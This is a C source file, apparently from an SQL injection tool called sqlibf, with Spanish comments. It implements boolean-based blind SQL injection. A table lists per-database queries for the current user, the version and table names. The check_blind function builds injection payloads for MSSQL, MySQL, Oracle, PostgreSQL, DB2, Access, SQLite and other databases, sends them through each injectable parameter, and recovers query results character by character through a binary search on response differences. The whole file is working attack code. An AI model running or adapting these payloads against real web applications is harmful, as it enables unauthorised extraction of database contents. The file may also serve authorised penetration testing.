/*
 * <blind.c>
 */


#include "sqlibf.h"

/*
#define MSSQL         1
#define ORACLE        2
#define DB2           3
#define MYSQL         4
#define POSTGRESQL    5
#define INFORMIX      6
#define SYBASE        7
#define ACCESS        8
#define POINTBASE     9
#define SQLITE        10
#define HSQLDB        11
#define INGRES        12
#define INTERBASE     13
#define MYSQL4        14
#define MYSQL5        15

  char query="USER"; // DB2, Oracle, Postgres, Sqlserver, Informix, Sybase
  char query_mysql[]="USER()"; // Mysql
  char query_access[]="NOW()"; // Access
  char query_sqlite[]="sqlite_version()"; // SQLite

*/

static struct strings sql_strings[] =
{
  { 0 /* database*/, "USER", "VERSION", "DATABASES", "TABLES", "COLUMNS" },
  { MSSQL, "USER", "@@VERSION", "", "select name from sysobjects a where (select count(*) from sysobjects b where a.name > b.name)=%d", "" },
  { ORACLE, "USER", "select min(BANNER) from V$VERSION WHERE rownum=1", "", "SELECT table_name FROM (SELECT n.*, ROWNUM as r FROM user_tables n) WHERE r=%d", "" },
  { DB2, "USER", "select cast(versionnumber as char(6)) from sysibm.sysversions fetch first 1 row only", "", "select tabname from syscat.tables a where (select count(*) from syscat.tables b where a.tabname > b.tabname)=%d", "" },
  { MYSQL, "user()", "version()", "NO", "NO", "NO" },
  { POSTGRESQL, "USER", "version()", "", "select tablename from pg_tables limit 1 offset %d", "" },
  { INFORMIX, "USER", "select distinct dbinfo('version','full') from sysmaster:informix.systables", "", "", "" },
  { SYBASE, "USER", "@@VERSION", "", "", "" },
  { ACCESS, "NOW()", "NO", "NO", "SELECT Name FROM MSysObjects WHERE Type=1 AND Flags=0", "" },
  { POINTBASE, "CURRENT_USER", "NO", "", "", "" },
  { SQLITE, "sqlite_version()", "sqlite_version()", "", "", "" },
  { HSQLDB, "CURRENT_USER", "NO", "", "", "" },
  { INGRES, "CURRENT_USER", "NO", "", "", "" },
  { INTERBASE, "USER", "NO", "", "", "" },
  { MYSQL4, "user()", "version()", "NO", "NO", "NO" },
  { MYSQL5, "user()", "version()", "", "SELECT table_name from INFORMATION_SCHEMA.TABLES limit 1,%d", "" },
};


//
// CHECK_BLIND ______________________________________________________________________
//
// Uso: Intenta extraer informacion utilizando pruebas booleanas ciegas
//

int check_blind(struct cracked_url cu, char *my_query) {
  struct assembled_url au;
  struct result resultado;
  struct query_string *ptr_param;
  char append[STRING_SIZE];
  int comparacion=0;
  int counter=1;
  int posicion=1;
  char char_base[128]=      "                                 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ";
  //char  db2_base[128]=      "                                 _-,;:!?/.`^~'\"()[]{}@$*\\&#%+<=>|0123456789aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ ";
  // -----------------------|                                 |                               |                               |                              ";
  int char_code=0;
  int signo=1;
  int incremento=0;
  char query[STRING_SIZE]="";
  int space_found=0;
  int original=0;
  int added_words=4;


  strncpy(query, sql_strings[db_from_finger].user, STRING_SIZE-1);

  if(strlen(my_query)) {
    if(db_from_finger==MYSQL) IMPRIME("(!) WARNING: Maybe this database don't allows subquerys.\n"); // Mysql3 no admite subselects en substr()
    strncpy(query, my_query, STRING_SIZE-1);
    }


  IMPRIME("[ 8.0 ] Doing BLIND Tests\n");

  ptr_param=cu.url_params;

  while(counter<=cu.param_num) {
    if(ptr_param->siguiente==0) ptr_param=cu.post_params;
    if(ptr_param->is_injectable) {

      if(ptr_param->is_injectable==NUMERIC || ptr_param->is_injectable==STRING_CONCAT_PLUS || ptr_param->is_injectable==STRING_CONCAT_PIPE) added_words=0;

      base_error.body_words=ptr_param->error_words;
      base_error.body_lines=ptr_param->error_lines;
      if(ptr_param->is_dinamic==DINAMIC_KEY) strncpy(key_word, ptr_param->my_keyword, WORD_SIZE-1);
      if(ptr_param->is_dinamic==DINAMIC_LW && options.test_type==KEY_WORD) { options.test_type=LINES; original=KEY_WORD; }

      IMPRIME("[ 8.%d.0 ] Trying blind at Parameter: '%s'\n", counter, variable_name(cu, counter));
      IMPRIME("--> QUERY: %s\n", query);

      posicion=1;
      space_found=0;
      ptr_param->terminator=FINGER;

      while(posicion<BLIND_MAX) {

        signo=1;
        incremento=64;
        char_code=63;

        while(incremento>=1) {

          switch(db_from_finger) {
            case MSSQL:
            case SYBASE:
              sprintf(append, " and ascii(substring((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-(sign(ascii(substring((%s),%d,1))-%d)-1)", query, posicion, char_code);
              if(ptr_param->is_injectable==STRING_CONCAT_PLUS) sprintf(append, "+substring('1',1,(sign(ascii(substring((%s),%d,1))-%d)-1))+'", query, posicion, char_code);
              if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) sprintf(append, "-(select case when ascii(substring((%s),%d,1))>%d then 1/0 else 0 end)", query, posicion, char_code);
              break;
            case MYSQL:
            case MYSQL4:
              sprintf(append, " and ascii(substring((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-(sign(ascii(substring((%s),%d,1))-%d)-1)", query, posicion, char_code);
              if(ptr_param->is_injectable==STRING_CONCAT_PLUS) sprintf(append, "+substring(1,1,(%d-(ascii(substring((%s),%d,1))-1)))+'", char_code, query, posicion);
              break;
            case ACCESS:
              sprintf(append, " and asc(mid((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-round(exp(%d-asc(mid((%s),%d,1))))", char_code, query, posicion);
              if(ptr_param->is_injectable==STRING_CONCAT_PLUS) sprintf(append, "+mid('1',1,(round(exp(%d-asc(mid((%s),%d,1))))))+'", char_code, query, posicion);
              break;
            case INFORMIX: // sin ascii
            case SQLITE:
              sprintf(append, " and substr((%s),%d,1)>'%c' and ", query, posicion, char_base[char_code]);
              if(ptr_param->is_injectable==NUMERIC) IMPRIME("(!) WARNING: This database don't allow this kind of test.\n");
              if(ptr_param->is_injectable==STRING_CONCAT_PIPE) IMPRIME("(!) WARNING: This database don't allow this kind of test.\n");
              break;
            case ORACLE:
              sprintf(append, " and ascii(substr((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-(sign(ascii(substr((%s),%d,1))-%d)-1)", query, posicion, char_code);
              if(ptr_param->is_injectable==STRING_CONCAT_PIPE) sprintf(append, "||substr(1,1,(%d-(ascii(substr((%s),%d,1))-1)))||'", char_code, query, posicion);
              if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) sprintf(append, "-(select case when ascii(substr((%s),%d,1))>%d then 1/0 else 0 end from dual)", query, posicion, char_code);
              break;
            case POSTGRESQL:
              sprintf(append, " and ascii(substr((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-(sign(ascii(substr((%s),%d,1))-%d)-1)", query, posicion, char_code);
              if(ptr_param->is_injectable==STRING_CONCAT_PIPE) sprintf(append, "||substr(1,1,cast((sign(ascii(substr((%s),%d,1))-%d)-1) as int))||'", query, posicion, char_code);
              if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) sprintf(append, "-(select case when ascii(substr((%s),%d,1))>%d then 1/(length(USER)-length(USER)) else 0 end)", query, posicion, char_code);
              break;
            case INTERBASE:
              sprintf(append, " and substring((%s) from %d for 1)>'%c' and ", query, posicion, char_base[char_code]);
              if(ptr_param->is_injectable==NUMERIC) IMPRIME("(!) WARNING: This database don't allow this kind of test.\n");
              if(ptr_param->is_injectable==STRING_CONCAT_PIPE) IMPRIME("(!) WARNING: This database don't allow this kind of test.\n");
              break;
            case DB2:
            default:
              // Sustitucion de emergencia en caso de que no exista ascii()
              //sprintf(append, " and hex(substr((%s),%d,1))>'%x'", query, posicion, char_code);
              //sprintf(append, " and substr((%s),%d,1)>'%c'", query, posicion, db2_base[char_code]);
              sprintf(append, " and ascii(substr((%s),%d,1))>%d and ", query, posicion, char_code);
              if(ptr_param->is_injectable==NUMERIC) sprintf(append, "-(sign(ascii(substr((%s),%d,1))-%d)-1)", query, posicion, char_code);
              if(ptr_param->is_injectable==STRING_CONCAT_PIPE) sprintf(append, "||substr('1',1,(sign(ascii(substr((%s),%d,1))-%d)-1))||'", query, posicion, char_code);
              if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) sprintf(append, "-(select case when ascii(substr((%s),%d,1))>%d then 1/abs(0) else 0 end from sysibm.systables)", query, posicion, char_code);break;
            }


          au=assemble_url(cu, counter, append);

          resultado=get_url(au);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            signo=1;
            if(incremento==1) char_code++;
            } else {
            signo=-1;
            }

          incremento=(incremento/2);
          char_code=char_code+(signo*incremento);

          IMPRIME("\x08%c", char_base[char_code]); fflush(stdout);
          //IMPRIME("\x08%c", db2_base[char_code]); fflush(stdout);

          } // While incremento

          IMPRIME("\x08%c ", char_base[char_code]); fflush(stdout);
          //IMPRIME("\x08%c", db2_base[char_code]); fflush(stdout);
          if(options.debuging>2) IMPRIME("++ FOUND CHAR: %c [%d]\n", char_base[char_code], char_code);
          if(char_code==0) { IMPRIME("\n##EOF##\n"); posicion=1000; }
          if(char_code==127) { IMPRIME("\n##EOF##\n"); posicion=1000; }
          if(char_code==32 && space_found) { IMPRIME("\n##EOF##\n"); posicion=1000; }
          if(char_code==32) { space_found=1; } else { space_found=0; }

          posicion++;

        } // While posicion

      IMPRIME("\n");
      if(original) options.test_type=KEY_WORD;

      }

    counter++;
    ptr_param=ptr_param->siguiente;

    }

  return 0;

}


